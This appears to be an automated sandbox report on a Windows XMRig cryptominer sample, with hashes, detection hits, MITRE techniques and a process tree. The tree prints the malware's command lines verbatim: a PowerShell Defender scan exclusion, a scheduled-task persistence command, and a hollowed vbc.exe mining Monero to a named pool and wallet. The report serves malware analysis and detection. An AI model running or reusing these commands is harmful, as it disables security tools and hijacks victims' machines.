xmrig | b3ecd25daf25e1863a10d36fec267279ec344b291b1d042580668ee54f0c0788

Resubmissions

06/03/2024, 22:46

240306-2pzx2abc39 7

23/12/2022, 20:25

221223-y7mhwahb34 10

23/12/2022, 20:11

221223-yx8ncscc9x 10

23/12/2022, 20:03

221223-ys7v9sha97 10

Analysis

max time kernel
633s
max time network
631s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
23/12/2022, 20:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Size

2.1MB
MD5

55a350a007f6943a7e09f4abfdfa6979
SHA1

c94e84ddbb6f525cfa675791c7f2d9b36d28a3ef
SHA256

896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80
SHA512

707269690787a70980cfc2658592cef762503ce7228fdfa56f5d584552327d28e338cc877fb37b1414f451a9c05a05fe3e134bc0197563a266fd62ab539bdc16
SSDEEP

49152:yMkkwgEEIRmnl1DVHYYhdxiUFZ4l7jl1nUI3gg+cnIFPsxdgyg:yDkfRX4UTDennUI3gvcIlRz

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 21 IoCs

miner

resource	yara_rule
behavioral1/memory/1692-111-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-113-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-115-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-116-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-118-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-120-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-121-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-123-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-125-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-126-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1692-128-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-130-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-133-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1692-136-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1104-169-0x0000000003350000-0x00000000035D6000-memory.dmp	xmrig
behavioral1/memory/1216-269-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/1216-273-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1216-274-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig
behavioral1/memory/1104-341-0x00000000031E0000-0x0000000003466000-memory.dmp	xmrig
behavioral1/memory/848-364-0x0000000140343234-mapping.dmp	xmrig
behavioral1/memory/848-368-0x0000000140000000-0x00000001407C9000-memory.dmp	xmrig

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1208 set thread context of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1164 set thread context of 0	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
PID 1324 set thread context of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 2012 set thread context of 848	2012	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	135
PID 1800 set thread context of 0	1800	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1912	schtasks.exe
676	schtasks.exe
804	schtasks.exe
1692	schtasks.exe
820	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1424	powershell.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1104	taskmgr.exe

Suspicious behavior: LoadsDriver 3 IoCs

pid	Process
460	Process not Found
460	Process not Found
460	Process not Found

Suspicious use of AdjustPrivilegeToken 19 IoCs

description	pid	Process
Token: SeDebugPrivilege	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Token: SeDebugPrivilege	1104	taskmgr.exe
Token: SeDebugPrivilege	1424	powershell.exe
Token: SeLockMemoryPrivilege	1692	vbc.exe
Token: SeLockMemoryPrivilege	1692	vbc.exe
Token: SeDebugPrivilege	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Token: SeDebugPrivilege	860	powershell.exe
Token: SeDebugPrivilege	188	powershell.exe
Token: SeDebugPrivilege	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Token: SeDebugPrivilege	1220	powershell.exe
Token: SeLockMemoryPrivilege	1216	vbc.exe
Token: SeLockMemoryPrivilege	1216	vbc.exe
Token: SeDebugPrivilege	1732	powershell.exe
Token: SeDebugPrivilege	2012	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Token: SeDebugPrivilege	432	powershell.exe
Token: SeLockMemoryPrivilege	848	vbc.exe
Token: SeLockMemoryPrivilege	848	vbc.exe
Token: SeDebugPrivilege	1800	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
Token: SeDebugPrivilege	2032	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1692	vbc.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe
1104	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1208 wrote to memory of 1424	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	28
PID 1208 wrote to memory of 1424	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	28
PID 1208 wrote to memory of 1424	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	28
PID 1208 wrote to memory of 792	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	31
PID 1208 wrote to memory of 792	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	31
PID 1208 wrote to memory of 792	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	31
PID 792 wrote to memory of 1692	792	cmd.exe	34
PID 792 wrote to memory of 1692	792	cmd.exe	34
PID 792 wrote to memory of 1692	792	cmd.exe	34
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1208 wrote to memory of 1692	1208	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	36
PID 1164 wrote to memory of 860	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	41
PID 1164 wrote to memory of 860	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	41
PID 1164 wrote to memory of 860	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	41
PID 1164 wrote to memory of 1480	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	43
PID 1164 wrote to memory of 1480	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	43
PID 1164 wrote to memory of 1480	1164	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	43
PID 1480 wrote to memory of 820	1480	cmd.exe	45
PID 1480 wrote to memory of 820	1480	cmd.exe	45
PID 1480 wrote to memory of 820	1480	cmd.exe	45
PID 1384 wrote to memory of 188	1384	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	49
PID 1384 wrote to memory of 188	1384	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	49
PID 1384 wrote to memory of 188	1384	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	49
PID 1324 wrote to memory of 1220	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	116
PID 1324 wrote to memory of 1220	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	116
PID 1324 wrote to memory of 1220	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	116
PID 1324 wrote to memory of 1756	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	118
PID 1324 wrote to memory of 1756	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	118
PID 1324 wrote to memory of 1756	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	118
PID 1756 wrote to memory of 1912	1756	cmd.exe	120
PID 1756 wrote to memory of 1912	1756	cmd.exe	120
PID 1756 wrote to memory of 1912	1756	cmd.exe	120
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 1324 wrote to memory of 1216	1324	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	122
PID 852 wrote to memory of 1732	852	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	124
PID 852 wrote to memory of 1732	852	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	124
PID 852 wrote to memory of 1732	852	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	124
PID 2012 wrote to memory of 432	2012	896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe	130

C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1424
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:792
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1692
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:1692

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1104

C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1164
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:860
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1480
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
    3⤵
    - Creates scheduled task(s)
    PID:820

C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1384
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:188

C:\Users\Admin\Desktop\vbc.exe
"C:\Users\Admin\Desktop\vbc.exe"
1⤵
PID:2032

C:\Users\Admin\Desktop\vbc.exe
"C:\Users\Admin\Desktop\vbc.exe"
1⤵
PID:392

C:\Users\Admin\Desktop\vbc.exe
"C:\Users\Admin\Desktop\vbc.exe"
1⤵
PID:612

C:\Users\Admin\Desktop\vbc.exe
"C:\Users\Admin\Desktop\vbc.exe"
1⤵
PID:1064

C:\Users\Admin\Desktop\vbc.exe
"C:\Users\Admin\Desktop\vbc.exe"
1⤵
PID:1596

C:\Users\Admin\Desktop\vbc.exe
"C:\Users\Admin\Desktop\vbc.exe"
1⤵
PID:704

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:668

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:904

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:988

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1232

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:760

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1748

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1692

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1568

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:816

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:632

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1340

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1532

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:432

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1596

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:568

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1588

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1368

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1992

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1888

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1716

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:268

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:760

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1592

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:2020

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1372

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1500

C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1220
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1756
- - C:\Windows\system32\schtasks.exe
    schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "HMHM" /tr "C:\ProgramData\edge\HMHM.exe"
    3⤵
    - Creates scheduled task(s)
    PID:1912
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o xmr-eu1.nanopool.org:14433 -u 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQoBJqYKAGMEQrLE8L8 --tls --coin monero
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1216

C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\AppData\Local\Temp\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\ProgramData'
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1732

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
1⤵
PID:1628

C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe
"C:\Users\Admin\Desktop\896bad806fe646d498f70e456adb6296a5199f81ce4daaae2b8c65fad9426f80.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
